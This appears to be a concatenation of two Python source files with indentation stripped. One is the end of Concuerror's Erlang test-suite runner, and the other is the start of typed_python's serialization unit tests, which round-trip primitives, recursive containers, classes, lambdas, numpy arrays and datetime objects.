status = os.system(
("%s -kq --assume_racing false"
" %s -f %s"
" --output %s"
" -m %s -t %s %s %s"
)
% (concuerror, dpor_flag, " ".join(files),
rslt, modn, funn, bound, bound_type))
# Compare the results
has_crash = "crash" in flags
orig = "%s/suites/%s/results/%s" % (dirname, suite, txtname)
equalRes = equalResults(suite, name, orig, rslt)
if status != 512 and not has_crash:
finished = True
elif status == 512 and has_crash:
finished = True
else:
finished = False
# Print the results
lock.acquire()
total_tests.value += 1
suitename = re.sub('\_tests$', '', suite)
logline = ("%-8s %-63s"
% (suitename,
name+", "+funn_output+", "+preb_output+", "+dpor_output))
if equalRes and finished:
# We don't need to keep the results file
try:
os.remove(rslt)
except:
pass
print "%s \033[01;32m ok\033[00m" % (logline)
else:
total_failed.value += 1
print "%s \033[01;31mfailed\033[00m" % (logline)
lock.release()
sema.release()
def equalResults(suite, name, orig, rslt):
global dirname
beamdir = "%s/suites/%s/src" % (dirname, suite)
cmd = ("erl -boot start_clean -noinput -pa %s/%s -pa %s"
" -run scenarios exceptional \"%s\" \"%s\" \"%s\""
% (beamdir, name, beamdir, name, orig, rslt))
if 0 == subprocess.call(cmd, shell=True):
return True
else:
return 0 == subprocess.call("bash differ %s %s" % (orig, rslt), shell=True)
#---------------------------------------------------------------------
# Main program
# Get the directory of Concuerror's testsuite
dirname = os.path.abspath(os.path.dirname(sys.argv[0]))
concuerror = os.getenv("CONCUERROR", dirname + "/../bin/concuerror")
results = os.path.abspath(dirname + "/results")
# Ensure made
assert 0 == os.system("%s --version" % (concuerror))
assert 0 == os.system("erlc scenarios.erl")
# If we have arguments we should use them as tests,
# otherwise check them all
if len(sys.argv) > 1:
tests = sys.argv[1:]
tests = [os.path.abspath(item) for item in tests]
else:
tests = glob.glob(dirname + "/suites/*/src/*")
# How many threads we want (default, number of CPUs in the system)
threads = os.getenv("THREADS", "")
if threads == "":
try:
threads = str(max(1, cpu_count() - 1))
except:
threads = "1"
# Print header
print "Concuerror's Testsuite (THREADS=%d)\n" % int(threads)
print "%-8s %-63s %s" % \
("Suite", "Module, Test (' '=Module), Bound (' '=inf), DPOR (' '=optimal)", "Result")
print "-------------------------------------------------------------------------------"
# Create share integers to count tests and
# a lock to protect printings
lock = Lock()
total_tests = Value(c_int, 0, lock=False)
total_failed = Value(c_int, 0, lock=False)
sema = BoundedSemaphore(int(threads))
sema1 = BoundedSemaphore(int(threads))
# For every test do
procT = []
for test in tests:
p = Process(target=runTest, args=(test,))
procT.append(p)
sema1.acquire()
p.start()
# Wait
for p in procT:
p.join()
# Print overview
print "\nOVERALL SUMMARY for test run"
print " %d total tests, which contained" % len(tests)
print " %d scenarios, of which" % total_tests.value
print " %d caused unexpected failures!" % total_failed.value
if total_failed.value != 0:
exit(1)
|
types_serialization_test.py
|
# Copyright 2017-2019 typed_python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
import importlib
from abc import ABC, abstractmethod, ABCMeta
from typed_python.test_util import callFunctionInFreshProcess
import typed_python.compiler.python_ast_util as python_ast_util
import threading
import textwrap
import time
import unittest
import numpy
import numpy.linalg
import datetime
import pytest
import pytz
import gc
import pprint
import tempfile
import types
import typed_python.dummy_test_module as dummy_test_module
import typed_python.compiler.native_ast as native_ast
from typed_python.compiler.native_ast import Expression, NamedCallTarget
from typed_python.test_util import currentMemUsageMb
from typed_python.SerializationContext import createFunctionWithLocalsAndGlobals
from typed_python import (
TupleOf, ListOf, OneOf, Tuple, NamedTuple, Class,
Member, ConstDict, Alternative, serialize, deserialize,
Dict, Set, SerializationContext, EmbeddedMessage,
serializeStream, deserializeStream, decodeSerializedObject,
Forward, Final, Function, Entrypoint, TypeFunction, PointerTo,
SubclassOf
)
from typed_python._types import (
refcount, isRecursive, identityHash, buildPyFunctionObject,
setFunctionClosure, typesAreEquivalent, recursiveTypeGroupDeepRepr
)
module_level_testfun = dummy_test_module.testfunction
def moduleLevelFunctionUsedByExactlyOneSerializationTest():
return "please don't touch me"
def moduleLevelRecursiveF(x):
if x > 0:
return moduleLevelRecursiveF(x - 1) + 1
return 0
@Entrypoint
def moduleLevelEntrypointedFunction(x):
return x + 1
ModuleLevelAlternative = Alternative(
"ModuleLevelAlternative",
X={'a': int},
Y={'b': float}
)
class ModuleLevelNormalClass:
def method(self):
pass
class ModuleLevelNamedTupleSubclass(NamedTuple(x=int)):
def f(self):
return self.x
class ModuleLevelClass(Class, Final):
def f(self):
return "HI!"
def moduleLevelIdentityFunction(x):
return x
ModuleLevelRecursiveForward = Forward("ModuleLevelRecursiveForward")
ModuleLevelRecursiveForward = ModuleLevelRecursiveForward.define(
ConstDict(int, OneOf(None, ModuleLevelRecursiveForward))
)
moduleLevelDict = Dict(int, int)()
def moduleLevelDictGetter(x):
def f():
return (moduleLevelDict, x)
return f
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
class D(C):
def __init__(self, arg):
pass
class E(C):
def __getinitargs__(self):
return ()
class H:
pass
# Hashable mutable key
class K:
def __init__(self, value):
self.value = value
def __reduce__(self):
# Shouldn't support the recursion itself
return K, (self.value,)
import __main__ # noqa: E402
__main__.C = C
C.__module__ = "__main__"
__main__.D = D
D.__module__ = "__main__"
__main__.E = E
E.__module__ = "__main__"
__main__.H = H
H.__module__ = "__main__"
__main__.K = K
K.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
class pickling_metaclass(type):
def __eq__(self, other):
return (type(self) == type(other) and
self.reduce_args == other.reduce_args)
def __reduce__(self):
return (create_dynamic_class, self.reduce_args)
def create_dynamic_class(name, bases):
result = pickling_metaclass(name, bases, dict())
result.reduce_args = (name, bases)
return result
def create_data():
c = C()
c.foo = 1
c.bar = 2
# TODO: add support for complex numbers
# x = [0, 1, 2.0, 3.0+0j]
x = [0, 1, 2.0]
# Append some integer test cases at cPickle.c's internal size
# cutoffs.
uint1max = 0xff
uint2max = 0xffff
int4max = 0x7fffffff
x.extend([1, -1,
uint1max, -uint1max, -uint1max-1,
uint2max, -uint2max, -uint2max-1,
int4max, -int4max, -int4max-1])
y = ('abc', 'abc', c, c)
x.append(y)
x.append(y)
x.append(5)
return x
# Test classes for newobj
class MyInt(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyBytes(bytes):
sample = b"hello"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
class MySet(set):
sample = {"a", "b"}
class MyFrozenSet(frozenset):
sample = frozenset({"a", "b"})
myclasses = [MyInt, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict, MySet, MyFrozenSet]
REDUCE_A = 'reduce_A'
class AAA:
def __reduce__(self):
return str, (REDUCE_A,)
sc = SerializationContext({
'initarg': initarg,
'C': C,
'D': D,
'E': E,
'H': H,
'K': K,
'MyInt': MyInt,
'MyFloat': MyFloat,
'MyComplex': MyComplex,
'MyStr': MyStr,
'MyUnicode': MyUnicode,
'MyBytes': MyBytes,
'MyTuple': MyTuple,
'MyList': MyList,
'MyDict': MyDict,
'MySet': MySet,
'MyFrozenSet': MyFrozenSet,
'use_metaclass': use_metaclass,
'metaclass': metaclass,
'pickling_metaclass': pickling_metaclass,
'AAA': AAA,
})
@TypeFunction
def FancyClass(T):
class FancyClass_(Class, Final):
__name__ = "FancyClass(" + T.__name__ + ")"
def f(self):
return 1
return FancyClass_
def ping_pong(obj, serialization_context=None):
serialization_context = serialization_context or SerializationContext()
s = serialization_context.withoutCompression().serialize(obj)
try:
return serialization_context.withoutCompression().deserialize(s)
except Exception:
print("FAILED TO DESERIALIZE:")
print(s)
print(pprint.PrettyPrinter(indent=2).pprint(decodeSerializedObject(s)))
raise
class TypesSerializationTest(unittest.TestCase):
def assert_is_copy(self, obj, objcopy, msg=None):
"""Utility method to verify if two objects are copies of each others.
"""
if msg is None:
msg = "{!r} is not a copy of {!r}".format(obj, objcopy)
self.assertEqual(obj, objcopy, msg=msg)
self.assertIs(type(obj), type(objcopy), msg=msg)
if hasattr(obj, '__dict__'):
if isinstance(obj.__dict__, dict):
self.assertDictEqual(obj.__dict__, objcopy.__dict__, msg=msg)
self.assertIsNot(obj.__dict__, objcopy.__dict__, msg=msg)
if hasattr(obj, '__slots__'):
self.assertListEqual(obj.__slots__, objcopy.__slots__, msg=msg)
for slot in obj.__slots__:
self.assertEqual(
hasattr(obj, slot), hasattr(objcopy, slot), msg=msg)
self.assertEqual(getattr(obj, slot, None),
getattr(objcopy, slot, None), msg=msg)
def check_idempotence(self, obj, ser_ctx=None):
ser_ctx = ser_ctx or SerializationContext()
self.assert_is_copy(obj, ping_pong(obj, ser_ctx))
def test_serialize_core_python_objects(self):
self.check_idempotence(0)
self.check_idempotence(10)
self.check_idempotence(-10)
self.check_idempotence(-0.0)
self.check_idempotence(0.0)
self.check_idempotence(10.5)
self.check_idempotence(-10.5)
self.check_idempotence(None)
self.check_idempotence(True)
self.check_idempotence(False)
self.check_idempotence("")
self.check_idempotence("a string")
self.check_idempotence(b"")
self.check_idempotence(b"some bytes")
self.check_idempotence(())
self.check_idempotence((1,))
self.check_idempotence([])
self.check_idempotence({})
self.check_idempotence({"key": "value"})
self.check_idempotence({"key": "value", "key2": "value2"})
self.check_idempotence([])
self.check_idempotence([1, 2, 3])
self.check_idempotence(set())
self.check_idempotence({1, 2, 3})
self.check_idempotence(frozenset())
self.check_idempotence(frozenset({1, 2, 3}))
self.check_idempotence(int)
self.check_idempotence(object)
self.check_idempotence(type)
self.check_idempotence(TupleOf(int))
self.check_idempotence(TupleOf(int)([0x08]))
def test_serialize_python_dict(self):
d = {1: 2, 3: '4', '5': 6, 7.0: b'8'}
self.check_idempotence(d)
def test_serialize_recursive_list(self):
def check_reclist(size):
init = list(range(size))
reclist = list(init)
reclist.append(reclist)
alt_reclist = ping_pong(reclist)
for i in range(size):
self.assertEqual(init[i], alt_reclist[i])
self.assertEqual(reclist[i], alt_reclist[i])
self.assertIs(alt_reclist[size], alt_reclist)
for i in range(4):
check_reclist(i)
def test_serialize_memoizes_tuples(self):
ts = SerializationContext()
lst = (1, 2, 3)
for i in range(100):
lst = (lst, lst)
self.assertTrue(len(ts.serialize(lst)) < (i+1) * 100)
def test_serialize_objects(self):
class AnObject:
def __init__(self, o):
self.o = o
ts = SerializationContext({'O': AnObject})
o = AnObject(123)
o2 = ping_pong(o, ts)
self.assertIsInstance(o2, AnObject)
self.assertEqual(o2.o, 123)
def test_serialize_stream_integers(self):
for someInts in [(1, 2), TupleOf(int)((1, 2)), [1, 2]]:
self.assertEqual(
serializeStream(int, someInts),
b"".join([serialize(int, x) for x in someInts])
)
self.assertEqual(
deserializeStream(int, serializeStream(int, someInts)),
TupleOf(int)(someInts)
)
def test_serialize_stream_complex(self):
T = OneOf(None, float, str, int, ListOf(int))
for items in [
(1, 2),
("hi", None, 10, ListOf(int)([1, 2, 3, 4])),
()]:
self.assertEqual(
serializeStream(T, [T(x) for x in items]),
b"".join([serialize(T, x) for x in items])
)
self.assertEqual(
deserializeStream(T, serializeStream(T, [T(x) for x in items])),
TupleOf(T)([T(x) for x in items])
)
def test_serialize_recursive_object(self):
class AnObject:
def __init__(self, o):
self.o = o
ts = SerializationContext({'O': AnObject})
o = AnObject(None)
o.o = o
o2 = ping_pong(o, ts)
self.assertIs(o2.o, o2)
def test_serialize_primitive_native_types(self):
for t in [int, float, bool, type(None), str, bytes]:
self.assertIs(ping_pong(t), t)
def test_serialize_primitive_compound_types(self):
class A:
pass
B = Alternative("B", X={'a': A})
ts = SerializationContext({'A': A, 'B': B})
for t in [ ConstDict(int, float),
NamedTuple(x=int, y=str),
TupleOf(bool),
Tuple(int, int, bool),
OneOf(int, float),
OneOf(1, 2, 3, "hi", b"goodbye"),
TupleOf(NamedTuple(x=int)),
TupleOf(object),
TupleOf(A),
TupleOf(B)
]:
self.assertIs(ping_pong(t, ts), t)
def test_serialize_functions_basic(self):
def f():
return 10
ts = SerializationContext({'f': f})
self.assertIs(ping_pong(f, ts), f)
def test_serialize_alternatives_as_types(self):
A = Forward("A")
A = A.define(Alternative("A", X={'a': int}, Y={'a': A}))
ts = SerializationContext({'A': A})
self.assertIs(ping_pong(A, ts), A)
self.assertIs(ping_pong(A.X, ts), A.X)
def test_serialize_lambdas(self):
def check(f, args):
self.assertEqual(f(*args), ping_pong(f)(*args))
y = 20
def f(x):
return x + 1
def f2(x):
return x + y
check(f, (10,))
check(f2, (10,))
check(lambda x: x+1, (10,))
check(lambda x: (x, True, False), (10,))
check(lambda x: (x, "hi"), (10,))
check(lambda x: (x, None), (10,))
check(lambda x: x+y, (10,))
def test_serialize_class_instance(self):
class A:
def __init__(self, x):
self.x = x
def f(self):
return b"an embedded string"
ts = SerializationContext({'A': A})
serialization = ts.serialize(A(10))
self.assertTrue(b'an embedded string' not in serialization)
anA = ts.deserialize(serialization)
self.assertEqual(anA.x, 10)
anA2 = deserialize(A, serialize(A, A(10), ts), ts)
self.assertEqual(anA2.x, 10)
def test_serialize_and_numpy(self):
x = numpy.ones(10000)
ts = SerializationContext()
self.assertTrue(numpy.all(x == ts.deserialize(ts.serialize(x))))
sizeCompressed = len(ts.serialize(x))
ts.compressionEnabled = False
self.assertTrue(numpy.all(x == ts.deserialize(ts.serialize(x))))
sizeNotCompressed = len(ts.serialize(x))
self.assertTrue(sizeNotCompressed > sizeCompressed * 2, (sizeNotCompressed, sizeCompressed))
def test_serialize_and_numpy_with_dicts(self):
x = numpy.ones(10000)
self.assertTrue(numpy.all(ping_pong({'a': x, 'b': x})['a'] == x))
def test_serialize_and_threads(self):
class A:
def __init__(self, x):
self.x = x
ts = SerializationContext({'A': A})
OK = []
def thread():
t0 = time.time()
while time.time() - t0 < 1.0:
ping_pong(A(10), ts)
OK.append(True)
threads = [threading.Thread(target=thread) for _ in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(len(OK), len(threads))
def test_serialize_named_tuple(self):
X = NamedTuple(x=int)
self.check_idempotence(X(x=20))
def test_serialize_named_tuple_subclass(self):
class X(NamedTuple(x=int)):
def f(self):
return self.x
ts = SerializationContext({'X': X})
self.assertIs(ping_pong(X, ts), X)
self.assertTrue(ts.serialize(X(x=20)) != ts.serialize(X(x=21)))
self.check_idempotence(X(x=20), ts)
def test_serialization_context_queries(self):
sc = SerializationContext({
'X': False,
'Y': True,
})
self.assertIs(sc.objectFromName('X'), False)
self.assertIs(sc.nameForObject(False), 'X')
self.assertIs(sc.objectFromName('Y'), True)
self.assertIs(sc.nameForObject(True), 'Y')
def test_serializing_dicts_in_loop(self):
self.serializeInLoop(lambda: 1)
self.serializeInLoop(lambda: {})
self.serializeInLoop(lambda: {1: 2})
self.serializeInLoop(lambda: {1: {2: 3}})
def test_serializing_tuples_in_loop(self):
self.serializeInLoop(lambda: ())
self.serializeInLoop(lambda: (1, 2, 3))
self.serializeInLoop(lambda: (1, 2, (3, 4,), ((5, 6), (((6,),),))))
def test_serializing_lists_in_loop(self):
self.serializeInLoop(lambda: [])
self.serializeInLoop(lambda: [1, 2, 3, 4])
self.serializeInLoop(lambda: [1, 2, [3, 4, 5], [6, [[[[]]]]]])
def test_serializing_objects_in_loop(self):
class X:
def __init__(self, a=None, b=None, c=None):
self.a = a
self.b = b
self.c = c
c = SerializationContext({'X': X})
self.serializeInLoop(lambda: X(a=X(), b=[1, 2, 3], c=X(a=X())), context=c)
def test_serializing_numpy_arrays_in_loop(self):
self.serializeInLoop(lambda: numpy.array([]))
self.serializeInLoop(lambda: numpy.array([1, 2, 3]))
self.serializeInLoop(lambda: numpy.array([[1, 2, 3], [2, 3, 4]]))
self.serializeInLoop(lambda: numpy.ones(2000))
def test_serializing_anonymous_recursive_types(self):
NT = Forward("NT")
NT = NT.define(TupleOf(OneOf(int, NT)))
NT2 = ping_pong(NT)
# verify we can construct these objects
nt2 = NT2((1, 2, 3))
NT2((nt2, 2))
def test_serializing_named_tuples_in_loop(self):
NT = Forward("NT")
NT = NT.define(NamedTuple(x=OneOf(int, float), y=OneOf(int, TupleOf(NT))))
context = SerializationContext({'NT': NT})
self.serializeInLoop(lambda: NT(x=10, y=(NT(x=20, y=2),)), context=context)
def test_serializing_tuple_of_in_loop(self):
TO = TupleOf(int)
context = SerializationContext({'TO': TO})
self.serializeInLoop(lambda: TO((1, 2, 3, 4, 5)), context=context)
def test_serializing_alternatives_in_loop(self):
AT = Forward("AT")
AT = AT.define(Alternative("AT", X={'x': int, 'y': float}, Y={'x': int, 'y': AT}))
context = SerializationContext({'AT': AT}).withoutCompression()
self.serializeInLoop(lambda: AT, context=context)
self.serializeInLoop(lambda: AT.Y, context=context)
self.serializeInLoop(lambda: AT.X(x=10, y=20), context=context)
def test_inject_exception_into_context(self):
NT = NamedTuple()
context = SerializationContext({'NT': NT})
context2 = SerializationContext({'NT': NT})
def throws(*args):
raise Exception("Test Exception")
context.nameForObject = throws
context2.objectFromName = throws
with self.assertRaisesRegex(Exception, "Test Exception"):
context.serialize(NT)
data = context2.serialize(NT)
with self.assertRaisesRegex(Exception, "Test Exception"):
context2.deserialize(data)
def serializeInLoop(self, objectMaker, context=None):
# this test fails on macos for some reason
if sys.platform == "darwin":
return
context = context or SerializationContext()
memUsage = currentMemUsageMb()
t0 = time.time()
data = context.serialize(objectMaker())
while time.time() - t0 < .25:
context.deserialize(data)
gc.collect()
self.assertLess(currentMemUsageMb() - memUsage, 1.0)
##########################################################################
# The Tests below are Adapted from pickletester.py in cpython/Lib/test
def test_serialize_roundtrip_equality(self):
expected = create_data()
got = ping_pong(expected, sc)
self.assert_is_copy(expected, got)
def test_serialize_recursive_tuple_and_list(self):
t = ([],)
t[0].append(t)
x = ping_pong(t)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], list)
self.assertEqual(len(x[0]), 1)
self.assertIs(x[0][0], x)
def test_serialize_recursive_dict(self):
d = {}
d[1] = d
x = ping_pong(d)
self.assertIsInstance(x, dict)
self.assertEqual(list(x.keys()), [1])
self.assertIs(x[1], x)
def test_serialize_recursive_dict_key(self):
d = {}
k = K(d)
d[k] = 1
x = ping_pong(d, sc)
self.assertIsInstance(x, dict)
self.assertEqual(len(x.keys()), 1)
self.assertIsInstance(list(x.keys())[0], K)
self.assertIs(list(x.keys())[0].value, x)
def test_serialize_recursive_set(self):
y = set()
k = K(y)
y.add(k)
x = ping_pong(y, sc)
self.assertIsInstance(x, set)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], K)
self.assertIs(list(x)[0].value, x)
def test_serialize_recursive_inst(self):
i = C()
i.attr = i
x = ping_pong(i, sc)
self.assertIsInstance(x, C)
self.assertEqual(dir(x), dir(i))
self.assertIs(x.attr, x)
def test_serialize_recursive_multi(self):
lst = []
d = {1: lst}
i = C()
i.attr = d
lst.append(i)
x = ping_pong(lst, sc)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertTrue(x[0].attr[1] is x)
def check_recursive_collection_and_inst(self, factory):
h = H()
y = factory([h])
h.attr = y
x = ping_pong(y, sc)
self.assertIsInstance(x, type(y))
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], H)
self.assertIs(list(x)[0].attr, x)
def test_serialize_recursive_list_and_inst(self):
self.check_recursive_collection_and_inst(list)
def test_serialize_recursive_tuple_and_inst(self):
self.check_recursive_collection_and_inst(tuple)
def test_serialize_recursive_dict_and_inst(self):
self.check_recursive_collection_and_inst(dict.fromkeys)
def test_serialize_recursive_set_and_inst(self):
self.check_recursive_collection_and_inst(set)
def test_serialize_recursive_frozenset_and_inst(self):
self.check_recursive_collection_and_inst(frozenset)
def test_serialize_base_type_subclass(self):
assert sc.deserialize(sc.serialize(MyInt())) == MyInt()
assert sc.deserialize(sc.serialize(MyFloat())) == MyFloat()
assert sc.deserialize(sc.serialize(MyComplex())) == MyComplex()
assert sc.deserialize(sc.serialize(MyStr())) == MyStr()
assert sc.deserialize(sc.serialize(MyUnicode())) == MyUnicode()
assert sc.deserialize(sc.serialize(MyBytes())) == MyBytes()
assert sc.deserialize(sc.serialize(MyTuple())) == MyTuple()
assert sc.deserialize(sc.serialize(MyList())) == MyList()
assert sc.deserialize(sc.serialize(MyDict())) == MyDict()
assert sc.deserialize(sc.serialize(MySet())) == MySet()
assert sc.deserialize(sc.serialize(MyFrozenSet())) == MyFrozenSet()
def test_serialize_unicode_1(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>']
for u in endcases:
print("u = {}".format(u))
u2 = ping_pong(u)
self.assert_is_copy(u, u2)
def test_serialize_unicode_high_plane(self):
t = '\U00012345'
t2 = ping_pong(t)
self.assert_is_copy(t, t2)
def test_serialize_bytes(self):
for s in b'', b'xyz', b'xyz'*100:
s2 = ping_pong(s)
self.assert_is_copy(s, s2)
for s in [bytes([i]) for i in range(256)]:
s2 = ping_pong(s)
self.assert_is_copy(s, s2)
for s in [bytes([i, i]) for i in range(256)]:
s2 = ping_pong(s)
self.assert_is_copy(s, s2)
def test_serialize_ints(self):
n = sys.maxsize
while n:
for expected in (-n, n):
n2 = ping_pong(expected)
self.assert_is_copy(expected, n2)
n = n >> 1
def test_serialize_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for value in test_values:
got = ping_pong(value)
self.assert_is_copy(value, got)
def test_serialize_numpy_float(self):
deserializedVal = ping_pong(numpy.float64(1.0))
self.assertEqual(deserializedVal, 1.0)
self.assertIsInstance(deserializedVal, numpy.float64)
def test_serialize_reduce(self):
inst = AAA()
loaded = ping_pong(inst, sc)
self.assertEqual(loaded, REDUCE_A)
def test_serialize_getinitargs(self):
inst = initarg(1, 2)
loaded = ping_pong(inst)
self.assert_is_copy(inst, loaded)
def test_serialize_metaclass(self):
a = use_metaclass()
b = ping_pong(a, sc)
self.assertEqual(a.__class__, b.__class__)
@pytest.mark.skip(reason="Didn't even bother")
def test_serialize_dynamic_class(self):
import copyreg
a = create_dynamic_class("my_dynamic_class", (object,))
copyreg.pickle(pickling_metaclass, pickling_metaclass.__reduce__)
b = ping_pong(a)
self.assertEqual(a, b)
self.assertIs(type(a), type(b))
def test_class_serialization_stable(self):
class C:
pass
s = SerializationContext()
CSer = s.serialize(C)
s.serialize(C())
CSer2 = s.serialize(C)
assert CSer == CSer2
@pytest.mark.skip(reason="Fails on 3.8 for some reason")
def test_serialize_structseq(self):
import time
import os
t = time.localtime()
u = ping_pong(t)
self.assert_is_copy(t, u)
if hasattr(os, "stat"):
t = os.stat(os.curdir)
u = ping_pong(t)
self.assert_is_copy(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
u = ping_pong(t)
self.assert_is_copy(t, u)
def test_serialize_ellipsis(self):
u = ping_pong(...)
self.assertIs(..., u)
def test_serialize_notimplemented(self):
u = ping_pong(NotImplemented)
self.assertIs(NotImplemented, u)
def test_serialize_singleton_types(self):
# Issue #6477: Test that types of built-in singletons can be pickled.
singletons = [None, ..., NotImplemented]
for singleton in singletons:
u = ping_pong(type(singleton))
self.assertIs(type(singleton), u)
def test_serialize_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
loaded = ping_pong(obj)
self.assert_is_copy(obj, loaded)
def test_serialize_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
x = C()
x.foo = 42
x.bar = "hello"
y = ping_pong(x, sc)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_serialize_large_pickles(self):
# Test the correctness of internal buffering routines when handling
# large data.
data = (1, min, b'xy' * (30 * 1024), len)
loaded = ping_pong(data, sc)
self.assertEqual(len(loaded), len(data))
self.assertEqual(loaded, data)
def test_serialize_nested_names(self):
global Nested
class Nested:
class A:
class B:
class C:
pass
sc = SerializationContext({
'Nested': Nested,
'Nested.A': Nested.A,
'Nested.A.B': Nested.A.B,
'Nested.A.B.C': Nested.A.B.C
})
for obj in [Nested.A, Nested.A.B, Nested.A.B.C]:
with self.subTest(obj=obj):
unpickled = ping_pong(obj, sc)
self.assertIs(obj, unpickled)
def test_serialize_lambdas_more(self):
sc = SerializationContext()
with tempfile.TemporaryDirectory() as tf:
fpath = os.path.join(tf, "weird_serialization_test.py")
with open(fpath, "w") as f:
f.write("def f(x):\n return x + 1\n")
sys.path.append(tf)
m = importlib.import_module('weird_serialization_test')
# verify we can serialize this
deserialized_f = sc.deserialize(sc.serialize(m.f))
self.assertEqual(deserialized_f(10), 11)
assert not os.path.exists(fpath)
python_ast_util.clearAllCaches()
# at this point, the backing data for serialization is not there
# and also, the cache is cleared.
deserialized_f_2 = sc.deserialize(sc.serialize(deserialized_f))
self.assertEqual(deserialized_f_2(10), 11)
def test_serialize_result_of_decorator(self):
sc = SerializationContext()
def decorator(f):
def addsOne(x):
return f(x) + 1
return addsOne
@decorator
def g(x):
return x + 1
g2 = sc.deserialize(sc.serialize(g))
self.assertEqual(g2(10), g(10))
def test_serialize_modules(self):
sc = SerializationContext()
self.assertIs(pytz, sc.deserialize(sc.serialize(pytz)))
def test_serialize_submodules(self):
sc = SerializationContext()
self.assertEqual(
sc.deserialize(sc.serialize(numpy.linalg)),
numpy.linalg
)
def test_serialize_functions_with_references_in_list_comprehensions(self):
sc = SerializationContext()
# note that it matters that the 'module_level_testfun' is at the module level,
# because that induces a freevar in a list-comprehension code object
def f():
return [module_level_testfun() for _ in range(1)][0]
self.assertEqual(f(), "testfunction")
self.assertEqual(sc.deserialize(sc.serialize(f))(), "testfunction")
def test_serialize_functions_with_nested_list_comprehensions(self):
sc = SerializationContext()
def f():
return [[z for z in range(20)] for _ in range(1)]
self.assertEqual(sc.deserialize(sc.serialize(f))(), f())
def test_serialize_lambdas_with_nested_list_comprehensions(self):
sc = SerializationContext()
f = lambda: [[z for z in range(20)] for _ in range(1)]
self.assertEqual(sc.deserialize(sc.serialize(f))(), f())
def test_serialize_large_lists(self):
x = SerializationContext()
lst = ListOf(ListOf(int))()
lst.resize(100)
for sublist in lst:
sublist.resize(1000000)
t0 = time.time()
l2 = x.deserialize(x.serialize(lst))
print(time.time() - t0, " to roundtrip")
self.assertEqual(lst, l2)
def test_serialize_large_numpy_arrays(self):
x = SerializationContext()
a = numpy.arange(100000000)
a2 = x.deserialize(x.serialize(a))
self.assertTrue(numpy.all(a == a2))
def test_serialize_datetime_objects(self):
x = SerializationContext()
d = datetime.date.today()
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2, (d, type(d)))
d = datetime.datetime.now()
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2, (d, type(d)))
d = datetime.timedelta(days=1)
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2, (d, type(d)))
d = datetime.datetime.now().time()
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2, (d, type(d)))
d = pytz.timezone("America/New_York")
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2, (d, type(d)))
d = pytz.timezone("America/New_York").localize(datetime.datetime.now())
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2, (d, type(d)))
def test_serialize_dict(self):
x = SerializationContext()
d = Dict(str, str)()
d["hi"] = "hi"
d["a"] = "a"
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d, d2)
def test_serialize_set(self):
x = SerializationContext()
s = Set(str)()
self.assertEqual(s, x.deserialize(x.serialize(s)))
s.add("hi")
self.assertEqual(s, x.deserialize(x.serialize(s)))
s.add("bye")
self.assertEqual(s, x.deserialize(x.serialize(s)))
s.clear()
self.assertEqual(s, x.deserialize(x.serialize(s)))
def test_serialize_recursive_dict_more(self):
D = Forward("D")
D = D.define(Dict(str, OneOf(str, D)))
x = SerializationContext({"D": D})
d = D()
d["hi"] = "bye"
d["recurses"] = d
d2 = x.deserialize(x.serialize(d))
self.assertEqual(d2['recurses']['recurses']['hi'], 'bye')
@pytest.mark.skipif('sys.platform=="darwin"')
def test_serialize_dict_doesnt_leak(self):
T = Dict(int, int)
d = T({i: i+1 for i in range(100)})
x = SerializationContext()
assert not isRecursive(T)
usage = currentMemUsageMb()
for _ in range(20000):
x.deserialize(x.serialize(d))
self.assertLess(currentMemUsageMb(), usage+1)
@pytest.mark.skipif('sys.platform=="darwin"')
def test_serialize_array_doesnt_leak(self):
d = numpy.ones(1000000)
x = SerializationContext()
x.deserialize(x.serialize(d))
usage = currentMemUsageMb()
for passIx in range(30):
x.deserialize(x.serialize(d))
self.assertLess(currentMemUsageMb(), usage+2)
@pytest.mark.skipif('sys.platform=="darwin"')
def test_deserialize_set_doesnt_leak(self):
s = set(range(1000000))
x = SerializationContext()
